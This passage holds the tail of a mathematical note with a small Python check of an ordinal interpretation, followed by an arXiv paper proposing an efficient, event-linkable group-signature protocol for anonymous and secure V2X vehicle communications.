\(\mathsf{D}>\mathsf{C}>\mathsf{i}>\mathsf{E}>|\).
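The failure of weak monotonicity can also be checked mechanically. The following small sketch is our own: it models \(\omega\) by `float('inf')`, which suffices here because the only facts used are \(n+\omega=\omega\) for finite \(n\) and the lexicographic comparison of triples.

```python
# Sketch: checking that the interpretation D_A above is not weakly monotone.
OMEGA = float("inf")   # stand-in for the ordinal ω: n + ω = ω for every finite n

def add_ord(n, x):
    """n + x for a natural number n and x either a natural number or ω."""
    return OMEGA if x == OMEGA else n + x

def D_A(n, x):
    n1, n2, n3 = n
    x1, x2, x3 = x
    return (add_ord(n1, x1), n2 + x2, n2 + n3 + x2 + x3)

first, second = (1, 0, 0), (0, 0, 1)
arg = (OMEGA, 0, 0)
assert first > second                       # lexicographic order on triples
print(D_A(first, arg), D_A(second, arg))    # (inf, 0, 0)  (inf, 0, 1)
assert D_A(first, arg) < D_A(second, arg)   # a larger first argument yields a smaller result
```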
2307.13759
A Novel Computationally Efficient Group Signature for Anonymous and Secure V2X Communications
The use of vehicle-to-everything (V2X) communication is expected to significantly improve road safety and traffic management. We present an efficient protocol, called the AEE protocol, for protecting data authenticity and user privacy in V2X applications. Our protocol provides event-based linkability, which enables messages from a subject vehicle to be linked to a specific event in order to prevent Sybil attacks. Messages on different events are unlinkable to preserve the long-term privacy of vehicles. Moreover, our protocol introduces a new method for generating temporary public keys to reduce computing and transmission overheads. Such a temporary public key is bound with a certain event and is automatically revoked when the event is over. We describe how to apply our protocol in vehicular communications using two exemplar use cases. To further reduce the real-time computational complexity, our protocol enables us to decompose the cryptographic operations into offline processes for complex operations and real-time processes for fast computations.
Jia Liu, Liqun Chen, Mehrdad Dianati, Carsten Maple, Yan Yan
2023-07-25T18:36:04Z
http://arxiv.org/abs/2307.13759v1
# A Novel Computationally Efficient Group Signature for Anonymous and Secure V2X Communications ###### Abstract The use of vehicle-to-everything (V2X) communication is expected to significantly improve road safety and traffic management. We propose a novel efficient protocol, called AEE protocol, for protecting data authenticity and user privacy in V2X applications. Our protocol provides event-based likability, which enables messages from a subject vehicle to be linked to a specific event in order to prevent Sybil attacks. Messages on different events are unlinkable to preserve the long-term privacy of vehicles. Moreover, our protocol introduces a new method for generating temporary public keys to reduce computing and communication overheads. Such a temporary public key is bound with a certain event and is automatically revoked when the event is over. We describe how to apply our protocol in vehicular communications using two exemplar use cases. To further reduce the real-time computational complexity, our protocol enables us to decompose the cryptographic operations into offline processes for complex operations and real-time processes for fast computations. ## I Introduction Future vehicles are envisaged to use V2X (vehicle to everything) communications for a variety of safety, driving efficiency and infotainment applications. For example, vehicles use V2X communication technology to periodically (e.g., every 0.1s [4]) communicate their status information, such as position, speed, heading and acceleration, to surrounding vehicles and infrastructures. Vehicles can also be informed of crucial traffic information such as accidents, ice, fog, and rain. Vehicle awareness of its environment is increasingly considered to improve collision avoidance and reduce fatalities and injury severity. In this work, we shall consider how to secure two representative safety applications that rely on V2X communications: intersection management and cooperative awareness messages. Intersection management uses the communication between an intersection controller and the nearby vehicles to coordinate vehicles to cross the intersection safely. Cooperative awareness messages are broadcast periodically from each vehicle to inform other vehicles about their presence and status. Securing V2X communication is an indispensable prerequisite for acceptance of the applications enabled by such technologies. Harmful information from a malicious node can jeopardize the safety of target vehicles and endanger others in the vicinity. Therefore, on the one hand, it is a basic requirement to guarantee that information comes from a trusted source and has not been tampered with during transmission. Also, there is a need for tracking malicious nodes and behaviours. On the other hand, protecting vehicle privacy is also of great importance since communications in vehicular networks can be easily abused for vehicle tracking and compromising the privacy of the users. For example, the locations visited by a vehicle enable inference and profiling of the personal interests of its user. To this end, achieving security and privacy requirements at the same time is a challenging objective. A feasible balance between security and privacy in vehicular networks is the short-term linkability originally proposed in [25]. 
Short-term linkability allows tracking of the movement of a vehicle in a short period of time in order to thwart Sybil attacks (i.e., one vehicle claims to be multiple vehicles) as early as possible while preserving long-term privacy. This is a crucial property for many applications in vehicular networks, such as live traffic map generation, intersection management, and cooperative position. For example, a malicious vehicle may impersonate multiple vehicles and fake traffic congestion to deceive other vehicles to divert the traffic. Beyond the security features, in practice, computational efficiency is a big obstacle for deploying any security mechanism into vehicular networks. The exchange of vital information for safety-related V2X applications is very delay sensitive. In high-speed cooperative driving scenarios, the communication overhead of each packet and the computation latency at each vehicle must be very low to ensure the information exchange is effective. For example, the data processing time for a safety message should be less than 50ms according to the European standard [4]. To simultaneously achieve these seemingly contradicting requirements without compromising the functionality of V2X applications remain a challenge. **Our contributions.** This paper proposes the AEE protocol, an efficient, secure and privacy-enhancing protocol for V2X applications. Our protocol provides event-based linkability to prevent Sybil attacks. An event is uniquely identified using, for example, a timestamp, a location name, a random number, or an incident summary, depending on the use case. The proposed protocol first generates a modified group signature to include an event-linking token which is a unique token on each event for each user. Therefore, multiple signatures produced by the same user can be linked together on the basis of the event. However, messages signed by the same entity on different events are unlikable, which ensures the user's long-term privacy. This modified group signature scheme has its independent interests. To reduce computing and transmission overheads introduced in group signatures, we re-use the event-linking token as a self-certified temporary public key for generating simple and efficient traditional signatures called _event signatures_ to authenticate the subsequent messages. The group signature acts as a certificate for the temporary public key. Since each user can only create one temporary public key for each event, when the event is over, the temporary public key is automatically revoked. To ensure the desired level of privacy, the event has to be updated in an appropriate time frame. To demonstrate the applicability of the proposed scheme, we illustrate how to apply our scheme to V2X communications by considering two use cases: intersection management [12, 14] and cooperative awareness messages [4]. When future events are predictable, we devise an offline computing mechanism to generate the time-consuming group signatures in advance, which significantly reduces the computational delay of the cryptographic operations. Security properties of our scheme are formalised as anonymity, traceability, event linkability and unforgeability in a model for dynamic group signatures. We prove these properties using the random oracle model. **Outline.** The rest of this paper is organised as follows: Section II describes and summarises the existing related work. Section III describes the cryptographic preliminaries and computational assumptions. 
Section IV presents the model and security goals for our protocol. Section V presents the construction of our protocol. Section VI illustrates how to use our scheme to secure applications in V2X communications. Section VII evaluates performance of our protocol. Section VIII analyses security properties for our protocol. The paper concludes in Section IX. ## II Related work. There is a large body of literature on anonymous authentication schemes. Here we will focus on the research that is tailored to the vehicular networks. Short group signature scheme was originally proposed in [7] to provide anonymous authentications for each message broadcast in vehicular networks. Group signatures achieve authenticity, data integrity, anonymity, and accountability, while getting rid of the heavy overhead for handling numerous public key certificates in the PKI-based pseudonym schemes, e.g., [18, 16]. A group signature scheme enables members of a group to sign messages on behalf of the group. Signatures are verified using a single group public key, and thus they do not reveal the identity of the signer. However, it is not effective to directly apply a group signature scheme to applications in vehicular networks. This is because most of the group signature schemes, e.g., [7, 8, 10, 27, 11, 17, 20, 24], are based on cryptographic paring operations which are known to be computationally expensive. This makes group signatures unsuitable for direct and frequent authentication in delay-sensitive safety applications in V2X communications. Several papers [9, 22, 21, 25] propose hybrid solutions that generate a new temporary public/secret key pair and authenticate them with a group signature and then sign messages with a traditional digital signature scheme using the temporary private key. However, the aforementioned approaches suffer from several shortcomings. First, negotiating, creating and transmitting new temporary keys introduces extra overhead. It is also a non-trivial work if a verifier requires proof of the ownership of the temporary private key. Second, short-term linkability is not securely achieved. In the existing work [9, 22, 21, 25], short-term linkability is achieved by fixing the randoms used in group signatures or the temporary public key where a malicious user does not have to follow through and can break the linkability. Threshold authentication is proposed in [13, 11, 24, 27] for VANET communications where a message is viewed as trustworthy only after it has been endorsed by a certain number of vehicles. Since all the vehicles have to sign exactly the same message to increase the trustworthiness of the message, this method has several limitations. First of all, a safety message needs to be associated with a timestamp to ensure its effectiveness, but the timestamp may vary from vehicle to vehicle, and the messages from different vehicles cannot be exactly the same. Secondly, the threshold method does not apply to the use cases considered in our paper where a vehicle measures and signs its own kinematic information, which cannot be endorsed by any other vehicles. A time-dependent linking system [17] is proposed for vehicle-to-infrastructure communications where a token-generation unit broadcasts a time-token periodically. In comparison, the event in our scheme can be flexibly chosen and customised according to the regions and the real-time traffic conditions. 
Our scheme enables us to design an offline computation mechanism for the generation of group signatures when the future event is predictable or deterministic. Moreover, the linking token in [17] cannot be reused as a temporary public key, as our scheme can do. Moreover, the schemes in [11, 17, 27] do not support efficient opening, and the computational time for tracing a malicious vehicle is linear in the total number of vehicles. We stress that an efficient opening mechanism is indispensable for ensuring the accountability of vehicles and punishing malicious behaviours. The notion of linkability is not formalised in [24, 27]. A notion of linking soundness is defined in [17], but linking soundness only ensures that the attacker cannot forge a link among messages that are not expected to be linked, and this property can be satisfied by an arbitrary group signature scheme. A crucial aspect of linkability for preventing Sybil attacks is that the users cannot bypass the linkability of the messages that are supposed to be linked. We propose a framework which formalises anonymity, traceability, event linkability and unforgeability. The scheme in [24] is very time-consuming, and the security proofs are based on unusual assumptions. ## III Preliminaries Our protocol makes use of cryptographic bilinear maps. In this section, we review the definitions of cryptographic bilinear maps and describe the computational assumptions for the security of our scheme. _Bilinear Maps._ Let \(\mathbb{G}_{1},\mathbb{G}_{2}\) and \(\mathbb{G}_{T}\) be multiplicative groups of prime order \(p\). A function \(\hat{\mathfrak{e}}:\mathbb{G}_{1}\times\mathbb{G}_{2}\rightarrow\mathbb{G}_{T}\) is a bilinear map if it satisfies the following three properties: 1. Bilinear: \(\hat{\mathfrak{e}}(g^{a},h^{b})=\hat{\mathfrak{e}}(g,h)^{ab}\) for all \(g\in\mathbb{G}_{1},h\in\mathbb{G}_{2}\) and \(a,b\in\mathbb{Z}_{p}^{*}\). 2. Non-degenerate: there exists \(g\in\mathbb{G}_{1},h\in\mathbb{G}_{2}\) such that \(\hat{\mathfrak{e}}(g,h)\neq 1\). 3. Computable: there exists an efficient algorithm to compute \(\hat{\mathfrak{e}}(g,h)\) for all \(g\in\mathbb{G}_{1},h\in\mathbb{G}_{2}\). **Definition 1** (Discrete Logarithm (DL) assumption): _The DL assumption holds if, for all PPT adversaries \(\mathcal{A}\),_ \[\mathsf{Adv}_{\mathcal{A}}^{\text{DL}}(1^{\lambda})=\mathsf{Pr}\big{[} \mathcal{A}(\mathbb{G},q,g,g^{x})=x:x\leftarrow\mathbb{Z}_{p}^{*}\big{]}\] _is negligible in \(\lambda\)._ **Definition 2** (Decision Diffie-Hellman (DDH) assumption): _DDH assumption holds if for all PPT adversaries \(\mathcal{A}\),_ \[\mathsf{Adv}_{\mathcal{A}}^{\text{DDH}}(1^{\lambda})=\] \[\left|\begin{array}{c}\mathsf{Pr}\big{[}\mathcal{A}(\mathbb{G},q,g,g^{a},g^{b},g^{ab})=1\big{]}-\\ \mathsf{Pr}\big{[}\mathcal{A}(\mathbb{G},q,g,g^{a},g^{b},g^{c})=1\big{]}:a,b, c\leftarrow\mathbb{Z}_{p}^{*}\Bigg{|}\end{array}\right.\] _is negligible in \(\lambda\)._ **Definition 3** (External Diffie-Hellman (XDH) Assumption): _Given groups \(\mathbb{G}_{1},\mathbb{G}_{2},\mathbb{G}_{T}\) associated with a bilinear pairing \(\hat{\mathfrak{e}}:\mathbb{G}_{1}\times\mathbb{G}_{2}\rightarrow\mathbb{G}_{T}\). 
The XDH assumption holds if the DDH problem is hard in \(\mathbb{G}_{1}\) but easy in \(\mathbb{G}_{2}\)._ **Definition 4** (\(q\)-SDH Assumption): _Let \(\mathbb{G}_{1}\) and \(\mathbb{G}_{2}\) be two multiplicative groups of prime order \(p\) with generators \(g_{1}\) for \(\mathbb{G}_{1}\) and \(g_{2}\) for \(\mathbb{G}_{2}\). The \(q\)-Strong Diffie-Hellman (SDH) assumption holds if, for any PPT adversary \(\mathcal{A}\), the advantage_ \[\mathsf{Adv}_{\mathcal{A}}^{q\text{-SDH}}(1^{\lambda})=\mathsf{Pr}\big{[}\mathcal{A}(g_{1},g_{1}^{\gamma},\cdots,g_{1}^{\gamma^{q}},g_{2},g_{2}^{\gamma})=(g_{1}^{\frac{1}{\gamma+x}},x):\gamma\leftarrow\mathbb{Z}_{p}^{*}\big{]}\] _is negligible in \(\lambda\)._ ## IV Models and security goals In this section, we describe the system model, clarify the security assumptions and specify the security and privacy requirements. ### _System model_ Entities involved in our model are: * On-board Unit (OBU): this represents the hardware and software components that are part of a vehicle, such as the GPS receiver and kinematic sensors. An OBU has wireless interfaces such as DSRC, Bluetooth or LTE, through which the OBU can broadcast its status information and surrounding traffic information to its nearby OBUs. * Issuer: this is an authority that authorises which OBU can join the group to become a legitimate member. The issuer creates membership credentials for legitimate OBUs, which can be used to anonymously sign all the outgoing messages from these OBUs. In the context of the vehicular network, the issuer could be a transport authority, such as the Driver & Vehicle Licensing Agency (DVLA) in the United Kingdom. * Opener: this is an authority that can revoke the anonymity of a misbehaved OBU by opening its signatures. An opener could be a law enforcement agency or a judge. * Roadside Unit (RSU): an RSU is installed with hardware and software components, such as an intersection scheduling algorithm. RSUs are distributed along the roadside, typically at intersection areas. An RSU manages the OBUs that come within its wireless communication range and connects to the backbone networks. ### _Security assumptions_ We assume that OBUs are untrustworthy but tamper-evident, where tamper evidence describes the ability to detect and keep indisputable evidence when an adversary attempts to modify or break the hardware and software components. This is a common assumption (e.g., [11, 26]) and can be achieved using hardware and software security mechanisms such as the Trusted Platform Module (TPM) for automotive [3]. Each OBU is assumed to be equipped with a tamper-evident black box which provides secure storage for cryptographic keys and performs cryptographic operations, e.g., generating public/secret keys and creating and verifying signatures. The black box is also pre-loaded with public information, such as system parameters and authorities' public keys. This information can later be updated in a trustworthy manner using signed updates. An OBU registers with the issuer and obtains an anonymous credential which will be securely stored in the black box. Further discussions on the V2X applications can be found in Section VI. The assumptions on the capabilities of an adversary can vary for different security properties. Certain security properties, such as unforgeability, can be preserved even when an adversary learns the secret keys of authorities. The formal definitions of an adversary's capabilities for each security goal are presented in Figure 2 in the appendix. 
Roughly speaking, we consider the common threat model where an adversary can eavesdrop the wireless communication to collect, inject and modify messages. An adversary may possess some legitimate OBUs, break the devices to retrieve the stored cryptographic keys or modify the cryptographic algorithms. However, we assume the adversary cannot break the underlying cryptographic assumptions given in the following Section III. ### _Correctness and security goals_ The correctness and security properties of our AEE protocol are described below. Their formal definitions are defined using experiments involving an adversary and a challenger and can be found in Figure 2 in the appendix. CorrectnessThe correctness guarantees that 1) signatures produced by honest OBUs are accepted by the verification algorithms; 2) the honest opener can identify the signer of such signatures; 3) multiples signatures signed by the same honest OBU for the same event can be correctly linked. AnonymityThis requires that signatures do not reveal any information about the identity of the OBUs who produced them. Signatures produced by one signer but on different events should be unlinkable. TraceabilityThis ensures that the adversary cannot produce a signature that cannot be traced to a legitimate OBU. A designated trusted authority can revoke the anonymity of the message signer when there is a dispute. It aims to identify and punish malicious OBUs in case of liability investigation. Event linkabilityThis links signature involved in the same event signed by the same OBU, while signatures signed by the different OBUs or on different events cannot be linked. This implies that an OBU cannot produce unlinkable signatures for the same event. Event linkability prevents Sybil attacks in an early stage, compared to traceability. An OBU with a valid credential is not able to produce multiple messages on the same event that appear to be from different OBUs. UnforgeabilityThis ensures that a valid signature, including group signature and event signature, cannot be attributed to an honest member unless this member does produce it. It also guarantees that the link among multiple messages cannot be forged. Hence unforgeability of our \(\mathcal{ALE}\) scheme consists of three parts: * _Non-frameability of the group signature_ states that the adversary is unable to frame an honest OBU for producing a certain valid signature unless this OBU really did produce this signature. * _Unforgeability of the event signature_ states that the adversary is unable to forge an event signature that is related to a valid group signature produced by an honest OBU unless this OBU really did produce this signature. * _Unforgeability of the event linkability_ states that the adversary is unable to produce multiple signatures traced to the same signer on the same event, which is unlinkable, and also unable to forge the linkability with signatures signed by different OBUs. The adversary defined for unforgeability is much stronger since it may fully corrupt both the opener and the issuer. ## V Construction In this section, we present the detailed construction of our AEE protocol. The AEE protocol includes \(\mathsf{GSet}\), \(\mathsf{UKg}\), \(\mathsf{GSign}\), \(\mathsf{GVer}\), \(\mathsf{ESign}\), \(\mathsf{EVer}\), \(\mathsf{Link}\), \(\mathsf{Open}\) and \(\mathsf{Judge}\) algorithms, and the \((\mathsf{Join},\mathsf{Issue})\) protocol. 
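For orientation, the inputs and outputs of these algorithms (as specified in the remainder of this section) can be summarised in a rough interface sketch; the Python signatures and type aliases below are our own reading of the paper, not an implementation or an official API.

```python
# Illustrative interface sketch of the AEE algorithms; types are placeholders.
from typing import Any, Protocol, Tuple

GroupSig = Tuple[Any, ...]   # (D, B, T, c, s_x, s_y, s_alpha, s_delta)
EventSig = Tuple[Any, Any]   # (s_e, c_e)

class AEE(Protocol):
    def GSet(self, lam: int) -> Any: ...                    # gpk and master keys mix, mok
    def UKg(self, lam: int) -> Tuple[Any, Any]: ...         # long-term (upk[i], usk[i])
    def Join(self, gpk, i, upk_i, usk_i) -> Any: ...        # OBU side of registration -> gsk[i]
    def Issue(self, gpk, mix, reg, i, upk_i) -> Any: ...    # issuer side of registration
    def GSign(self, gpk, gsk_i, et: bytes, m: bytes) -> GroupSig: ...
    def GVer(self, gpk, et: bytes, m: bytes, sigma: GroupSig) -> bool: ...
    def ESign(self, usk_i, et: bytes, epk, m_e: bytes) -> EventSig: ...
    def EVer(self, et: bytes, epk, m_e: bytes, sigma_e: EventSig) -> bool: ...
    def Link(self, et: bytes, m0: bytes, s0: GroupSig, m1: bytes, s1: GroupSig) -> bool: ...
    def Open(self, gpk, mok, reg, sigma: GroupSig) -> Tuple[int, Any]: ...   # (i, proof)
    def Judge(self, gpk, i: int, upk_i, sigma: GroupSig, proof) -> bool: ...
```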
The \(\mathsf{GSet}\) algorithms initiate system parameters, and \(\mathsf{UKg}\) creates a long-term public/private key pair for each OBU. There are two types of signatures involved in our construction: _group signatures_ and _event signatures_. The group signatures are created by the \(\mathsf{GSign}\) algorithm and verified by the \(\mathsf{GVer}\) algorithm, while event signatures are created by the \(\mathsf{ESign}\) algorithm and verified by the \(\mathsf{EVer}\) algorithm. A group signature is an anonymous signature which contains an event-linking token to allow the \(\mathsf{Link}\) algorithm to link signers. Two group signatures on the same event from the same signer contain the same event-linking token. This token is later re-used as a temporal public key, called _event public key_, for generating event signatures using traditional digital signatures, which do not involve the time-consuming pairing operations. The group signature serves as an anonymous but event-linkable certificate for the event public key. When the event is over, the event public key is automatically revoked. The \(\mathsf{Open}\) algorithm enables the opener to trace a group signature to a signer and create a tracing proof to attest to the fact. This is for identifying and punishing a misbehaved OBU. The validity of the tracing proof can be checked by the \(\mathsf{Judge}\) algorithm. Our protocol is constructed using group signatures in [7] for anonymous authentication, linking token technique of Direct Anonymous Attestation [8] for achieving event-linkability, and Schnorr signatures [23] for constructing event signatures. Our scheme can be viewed as a hybrid scheme which combines the flexibility and convenience of a group signature with the efficiency of a traditional digital signature, which, besides stronger security and privacy and higher performance, can achieve better revocation than either of these two types of signatures alone. Since we re-use the event-linking token as a public key in event signatures, the security of the combined schemes becomes non-trivial. In fact, modelling and proving the security properties of such a protocol is challenging. Let \(\left(\mathbb{G}_{1},\mathbb{G}_{2},\mathbb{G}_{T}\right)\) be a bilinear group with prime order \(p\) and \(\hat{\mathfrak{e}}:\mathbb{G}_{1}\times\mathbb{G}_{2}\rightarrow\mathbb{G}_{T}\) is an efficient nondegenerate bilinear map. The protocol employs two cryptographic hash functions \(\mathcal{H}_{1}:\left\{0,1\right\}^{*}\rightarrow\mathbb{G}_{1}\) and \(\mathcal{H}_{2}:\left\{0,1\right\}^{*}\rightarrow\mathbb{Z}_{p}\). ### _Initialisation_ The algorithm \(\mathsf{GSet}(1^{\lambda})\) generates master secret keys for the issuer and the opener and group public parameters. The algorithm \(\mathsf{UKg}(1^{\lambda})\) produces a private/public key pair to be used as a long-term identity for an OBU. The algorithms proceed as follows. \(\mathsf{GSet}(1^{\lambda})\): * The issuer chooses \(\gamma\leftarrow\mathbb{Z}_{p}^{*}\), \(g_{1}\leftarrow\mathbb{G}_{1}\backslash\{1_{\mathbb{G}_{1}}\}\), \(g_{2}\leftarrow\mathbb{G}_{2}\backslash\{1_{\mathbb{G}_{2}}\}\), and computes \(w=g_{2}^{*}\). The issuer's master issuing key is \(\mathsf{mix}=\gamma\), which will be used to issue membership credentials for legitimate OBUs. * The opener chooses \(u\leftarrow\mathbb{G}_{1}\backslash\{1_{\mathbb{G}_{1}}\}\), \(\xi\leftarrow\mathbb{Z}_{p}^{*}\) and computes \(h=u^{\xi}\). The opener's master opening key is \(\mathsf{mok}=\xi\). 
* The group public key is \(\mathsf{gpk}=(g_{1},h,u,\mathcal{H}_{1},\mathcal{H}_{2},g_{2},w)\). \(\mathsf{UKg}(1^{\lambda})\): An OBU \(i\) chooses \(y\leftarrow\mathbb{Z}_{p}^{*}\) and sets its secret key as \(\mathsf{usk}[i]=y\) and public key as \(\mathsf{upk}[i]=h^{y}\). This key pair is an OBU's personal public key and secret key, which is used to authenticate the OBU when it registers with the issuer. The public key list upk is assumed to be public, and anyone can get an authentic public key of any user. This can be easily implemented using traditional public key infrastructure and certificates. ### _Registration of new members_ An OBU \(i\) can register with the issuer to become a legitimate group member through an interactive protocol \((\mathsf{Join}(\mathsf{gpk},i,\mathsf{upk}[i],\mathsf{usk}[i]),\mathsf{ Issue}(\mathsf{gpk},\mathsf{mix},\mathsf{reg},i,\mathsf{upk}[i]))\). Upon successful completion, the OBU \(i\) becomes a group member and obtains a _group signing key_ as its membership credential. The final state of the Issue algorithm is stored in the registration table at index \(\mathsf{reg}[i]\), whereas that of the Join is stored in \(\mathsf{gsk}[i]\). The communication between the OBU and the issuer is assumed to take place over secure channels, which can be easily established using TLS/SSL. \(\mathsf{Join}(\mathsf{gpk},i,\mathsf{upk}[i],\mathsf{usk}[i])\): Let \(y=\mathsf{usk}[i]\) and \(z=\mathsf{upk}[i]\). * OBU chooses a random \(r\leftarrow\mathbb{Z}_{p}^{*}\) and compute \(c=\mathcal{H}_{2}(h,z,h^{r})\) and \(s=r+cy\). Send \((z,c,s)\) to the issuer. This is to prove OBU's knowledge of its secret key \(y\) and show the ownership of its public key \(z\). * Upon receiving \((x,A)\) from the issuer, OBU checks if \(\hat{\mathsf{e}}(A,g_{z}^{*}w)=\hat{\mathsf{e}}(g_{1}\cdot z^{-1},g_{2})\). If successful, OBU sets \(\mathsf{gsk}[i]=(x,y,A)\) as its group signing key. * \(\mathsf{Issue}(\mathsf{gpk},\mathsf{mix},\mathsf{reg},i,\mathsf{upk}[i])\): Upon receiving \((z,c,s)\) from the OBU, the issuer verifies whether the proof is correct by computing \(\tilde{c}=\mathcal{H}_{2}(h,z,h^{s}z^{-c})\) and checking if \(c=\tilde{c}\). If successful, the issuer chooses \(x\leftarrow\mathbb{Z}_{p}^{*}\) and computes \(A=(g_{1}\cdot z^{-1})^{\frac{1}{s+2}}\). The issuer stores \((x,A)\) in a registration table at index \(\mathsf{reg}[i]=(x,A)\) and send \((x,A)\) to the OBU. ### _Generation of group signatures_ An OBU \(i\) can run an algorithm \(\mathsf{GSign}(\mathsf{gpk},\mathsf{gsk}[i],\mathsf{et},m)\) using its group signing key \(\mathsf{gsk}[i]\) to produce a group signature on a certain event et with message \(m\). This signature proves the knowledge of a valid group signing key in an anonymous way. The signature also certifies an event-linking token \(T\) to be used as a temporary public key in the following event signatures. Thus the message \(m\) can be a "hello" message or can be simply omitted. Assume the OBU's group signing key is \(\mathsf{gsk}[i]=(x,y,A)\). The algorithm proceeds as follows. * Choose \(\alpha\leftarrow\mathbb{Z}_{p}^{*}\) and compute \(D=u^{\alpha},B=Ah^{\alpha},T=\mathcal{H}_{1}(\mathsf{et})^{y}\). \(T\) is called the _event-linking token_. * Choose \(r_{x},r_{y},r_{\alpha},r_{\delta}\leftarrow\mathbb{Z}_{p}^{*}\). 
Compute \(R_{1},R_{2},R_{3},R_{4}\) as follows: \(R_{1}=u^{r_{\alpha}},R_{2}=\mathcal{H}_{1}(\mathsf{et})^{r_{y}},R_{3}=u^{rs}D^ {r_{x}}\) and \(R_{4}=\hat{\mathsf{e}}(B,g_{2})^{r_{x}}\hat{\mathsf{e}}(h,w)^{r_{\alpha}}\hat{ \mathsf{e}}(h,g_{2})^{r_{y}+r_{\delta}}\). * Compute \(c=\mathcal{H}_{2}(\mathsf{et},m,D,B,T,R_{1},R_{2},R_{3},R_{4})\), \(s_{x}=cx+r_{x},s_{y}=cy+r_{y},s_{\alpha}=-c\alpha+r_{\alpha}\) and \(s_{\delta}=-\alpha cx+r_{\delta}\). * Output a signature \(\sigma=(D,B,T,c,s_{x},s_{y},s_{\alpha},s_{\delta})\) as a group signature on the event et and message \(m\). The et can be chosen by an authority, like RSU, and can also be chosen by an individual vehicle, such as the lead vehicle in a platoon or a vehicle launching a certain event such as cooperative positioning [15, 28], or can be chosen by establishing an agreement among a group of vehicles. More discussions on et can be found in Section VI. Each OBU can only generate an unique event-linking token \(T=\mathcal{H}_{1}(\mathsf{et})^{y}\) for an event et. Within the event et, the group signatures from the same user are linkable because they have the same event-linking token. ### _Verification of group signatures_ Any recipient of a group signature \(\sigma\) on an event et and a message \(m\) can run algorithm \(\mathsf{GVer}(\mathsf{gpk},\mathsf{et},m,\sigma)\) to check the validity of the signature. The algorithm proceeds as follows. Parse \(\sigma\) as \((D,B,T,c,s_{x},s_{y},s_{\alpha},s_{\delta})\). Compute \(\tilde{R}_{1},\tilde{R}_{2},\tilde{R}_{3},\tilde{R}_{4}\) as follows: \(\tilde{R}_{1}=u^{s_{\alpha}}D^{c},\tilde{R}_{2}=\mathcal{H}_{1}(\mathsf{et})^ {sy}T^{-c},\tilde{R}_{3}=u^{s_{\delta}}D^{s_{\delta}}\) and \[\tilde{R}_{4}=\hat{\mathsf{e}}(B,g_{2})^{s_{x}}\hat{\mathsf{e}}(h,w)^{s_{ \alpha}}\hat{\mathsf{e}}(h,g_{2})^{s_{y}+s_{\delta}}\Big{(}\frac{\hat{ \mathsf{e}}(B,w)}{\hat{\mathsf{e}}(g_{1},g_{2})}\Big{)}^{c}\] Check if \(c=\mathcal{H}_{2}(\mathsf{et},m,D,B,T,\tilde{R}_{1},\tilde{R}_{2},\tilde{R}_{3 },\tilde{R}_{4})\). Output 1 if the check succeeds, else output 0. ### _Generation of event signatures_ After an OBU creates and broadcasts a group signature \(\sigma\) with an event-linking token \(T=\mathcal{H}_{1}(\mathsf{et})^{y}\), the OBU can use \(\mathit{epk}=(\mathcal{H}_{1}(\mathsf{et}),T)\) as an _event public key_ to produce event signatures that can be verified against this temporary public key. The event signatures are generated using algorithm \(\mathsf{ESign}(\mathsf{usk}[i],\mathsf{et},\mathit{epk},m_{e})\), which proceeds as follows. Let \(y=\mathsf{usk}[i]\) be the \(i\)-th OBU's secret key. Choose a random \(r\leftarrow\mathbb{Z}_{p}^{*}\). Compute \(R=\mathcal{H}_{1}(\mathsf{et})^{r}\) and \(c_{e}=\mathcal{H}_{2}(\mathsf{et},m_{e},\mathit{epk},R)\). Output an event signature \(\sigma_{e}=(s_{e},c_{e})\) where \(s_{e}=r+yc_{e}\). The event signatures are the traditional digital signatures which do not involve pairing operations and, for this reason, are much more efficient compared to group signatures. An OBU can use event signatures to, for example, update and sign its status information (e.g., GPS location, speed). Note that the event public key is self-certified in the group signature and is bound with the event et. When the event is over, the event public key is automatically revoked and is no longer valid. 
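To make the event-signature mechanics concrete, the following is a toy, insecure sketch of ESign together with the matching verification check (the EVer algorithm described in the next subsection). It replaces the pairing group \(\mathbb{G}_{1}\) with a tiny Schnorr subgroup of the integers and uses an ad-hoc hash-to-group map; these choices, the parameter sizes and the message strings are our own stand-ins and not part of the protocol.

```python
# Toy, insecure sketch of the event signature mechanics (Schnorr-style).
# G1 is replaced by a tiny Schnorr subgroup of integers; the hash-to-group
# map and all parameters below are illustrative stand-ins only.
import hashlib
import secrets

q, p, g = 2039, 1019, 4   # q = 2p + 1; g generates the order-p subgroup (toy sizes!)

def h1(et: bytes) -> int:
    """Stand-in for H1: hash the event identifier into the order-p subgroup."""
    e = int.from_bytes(hashlib.sha256(et).digest(), "big") % (p - 1)
    return pow(g, e + 1, q)        # exponent in [1, p-1], so never the identity

def h2(*parts) -> int:
    """Stand-in for H2: hash a transcript to a scalar in Z_p."""
    h = hashlib.sha256()
    for part in parts:
        h.update(repr(part).encode())
    return int.from_bytes(h.digest(), "big") % p

def esign(y: int, et: bytes, epk: int, m_e: bytes):
    """ESign: s_e = r + y*c_e with R = H1(et)^r and c_e = H2(et, m_e, epk, R)."""
    base = h1(et)
    r = secrets.randbelow(p - 1) + 1
    R = pow(base, r, q)
    c_e = h2(et, m_e, epk, R)
    return (r + y * c_e) % p, c_e

def ever(et: bytes, epk: int, m_e: bytes, sig) -> bool:
    """EVer: recompute R~ = H1(et)^{s_e} * epk^{-c_e} and re-derive the challenge."""
    s_e, c_e = sig
    base = h1(et)
    R = (pow(base, s_e, q) * pow(epk, -c_e, q)) % q    # negative exponent needs Python >= 3.8
    return c_e == h2(et, m_e, epk, R)

# Usage: the event-linking token T = H1(et)^y doubles as the event public key epk
# (in the paper, epk also records H1(et); here we keep just the token).
y = secrets.randbelow(p - 1) + 1                  # OBU secret usk[i]
et = b"intersection-42|2023-07-25T18:00"          # example event identifier
epk = pow(h1(et), y, q)                           # T, certified once by the group signature
sig = esign(y, et, epk, b"pos=...;speed=...")
assert ever(et, epk, b"pos=...;speed=...", sig)
```

Since only modular exponentiations appear in this path, the sketch also illustrates why event signatures avoid the pairing cost incurred by group signatures.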
